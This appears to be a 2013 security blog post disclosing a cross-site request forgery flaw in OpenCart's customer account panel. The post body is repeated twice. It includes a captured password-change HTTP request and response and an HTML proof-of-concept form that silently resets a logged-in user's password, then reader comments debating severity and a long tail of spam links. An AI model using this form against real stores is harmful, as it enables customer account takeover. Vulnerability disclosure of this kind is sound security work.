Hi , from last some days i was pentesting Opencart A Shopping Cart System .
www.opencart.com
And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.
So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . . now this is quite embarrassing that the latest version is still vuln :(
I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .
Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/
# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple Poc to change user Password
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
edit
www.opencart.com
And found OpenCart Latest Version is vulnerable to CSRF inside user panel .
You can edit user password and all stuff.
So i write the final description about the vulnerability and send it to exploit database sources.
The next day i got reply from PacketStromeSecurity Team that OpenCart CSRF is already reported previously to us and they send me the link.
What i found it was discovered in old versions and reported in 2010 . .
AHhhh . . now this is quite embarrassing that the latest version is still vuln :(
I again setup the latest version and found it is still vuln . . .
i don't know why this vulnerability has not been patch by OpenCart Development team as already reported by different security researchers . .
Oka so here is Exploit
http://www.securelist.com/en/advisories/53036
http://www.exploit-db.com/exploits/24921/
# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple Poc to change user Password
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
edit
OpenCart <= 1.5.6.1 SQL Injection
#Independent Pakistani Security Researcher
23 comments:
Nice 1... :)
Hey thanks a lot for updating me on opencart design & development with respect latest version on CSRF. This was really helpful.
OpenCart Development Customization
i know about this its pretty obvious and this guy isn't clever.
its not worth protecting accounts on the front side because:
1. you would need to trick a customer of a opencart store to visit a web page with the password changing vulnerability in linked to the store the customer is a member of. Hackers would not know which customers to target because no customer info such as email addresses are available from the front-end side of the store.
2. The person that the hackers are targeting would have to be logged into the the opencart store that you are targeting.
So you would have to mass mail about 6 billion people in the world and hope one of these people are logged into the store you are targeting too gain access to customer account which would be absolutely pointless since there is nothing to steal.
this is why so called security researchers like Saadat Ullah are scumbags because they never reveal how hard it would be to pull off a hack like this off but also completely pointless.
mean while a people who don't know about programming see this article about a vulnerability and don't have a clue believe this guys bull shit.
Daniel i am really happy with OpenCart. But hacking has often a social background, which invalidates your arguments.
If i know someone's email address and the fact that he's using a certain OpenCart shop on a regular basis, i could hijack his account and at least violate his privacy. Depending on the circumstances, I could even make a financial damage.
In the time you took to write this answer you could have fixed it by adding some (maybe 10) lines of code to your program.
Simply generate a security token in the controller, store it in the session, display it in a hidden input field within the form and in the post handler compare it with the token in the session.
OpenCart Store Design allows every online merchant to go online with their dream ecommerce solution by providing custom e-commerce shopping cart solution to sell your products.
Web Design Company India | Web Designing Company
Impressive and such a useful blog! Thanks for sharing.
UI Design Company Bangalore | UX Design Bangalore | Bangalore Web Design | UI Design Companies in Bangalore
Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!
Melbourne Web Hosting
Thanks for this post about latest version of opencart
Bitcoin payment for e commerce development | Pay Bitcoin for Ecommerce Development | web design Hubli
This is a great article. It gave me a lot of useful information Web Designing. thank you very much.
Outsource magento ecommerce services india
Hi,
Thanks for sharing a very interesting article about OpenCart Latest Version CSRF. This is very useful information for online blog review readers. Keep it up such a nice posting like this.
From,
WondersMind,
Web Development Company Bangalore
For me this blog is great, this blog is moving very important issues.
Katia
Hi,
Thanks for Sharing a very interesting article about OpenCart Latest Version CSRF. This is very useful information for online blog review readers. Keep it up such a nice posting like this.
Regards,
WondersMind,
Web Design Company Bangalore
thanks for sharing the article...
Well I definitely enjoyed reading it. This information offered by you is very effective for good planning.
Ecommerce App Development Company | Mobile App Development Company In India | Best Web Design Company India
Thanks you sharing information.
You can also visit on
How to think positive
Cure For Cowardice
Mudras
SOCIAL ANXIETY AND LOW SELF-ESTEEM
This is very good post i have read i must nappreciate to you to written this for us.It’s really informative.
send cake to mysore
online cake delivery to mysore
send flowers to mysore
online gifts delivery to mysore
web design hubli
Are you looking for an Cheap Digital Marketing Agency in USA? Just Visit us
Thank you for sharing this informative post. Looking forward tor read more.
blanket Manufacturer
pillow Manufacturer
outdoor textile Manufacturer
Informative blog! it was very useful for me.Thanks for sharing. Do share more ideas regularly.
Village Talkies a top-quality professional corporate video production company in Bangalore and also best explainer video company in Bangalore & animation video makers in Bangalore, Chennai, India & Maryland, Baltimore, USA provides Corporate & Brand films, Promotional, Marketing videos & Training videos, Product demo videos, Employee videos, Product video explainers, eLearning videos, 2d Animation, 3d Animation, Motion Graphics, Whiteboard Explainer videos Client Testimonial Videos, Video Presentation and more for all start-ups, industries, and corporate companies. From scripting to corporate video production services, explainer & 3d, 2d animation video production , our solutions are customized to your budget, timeline, and to meet the company goals and objectives.
As a best video production company in Bangalore, we produce quality and creative videos to our clients.
smm panel
Smm Panel
İSİLANLARİBLOG.COM
İnstagram takipçi satın al
https://www.hirdavatciburada.com
https://www.beyazesyateknikservisi.com.tr/
Servis
tiktok jeton hilesi
ümraniye beko klima servisi
beykoz lg klima servisi
üsküdar lg klima servisi
beykoz alarko carrier klima servisi
üsküdar alarko carrier klima servisi
maltepe lg klima servisi
kadıköy lg klima servisi
maltepe alarko carrier klima servisi
kadıköy alarko carrier klima servisi
özel ambulans
yurtdışı kargo
nft nasıl alınır
en son çıkan perde modelleri
uc satın al
minecraft premium
lisans satın al
en son çıkan perde modelleri
Post a Comment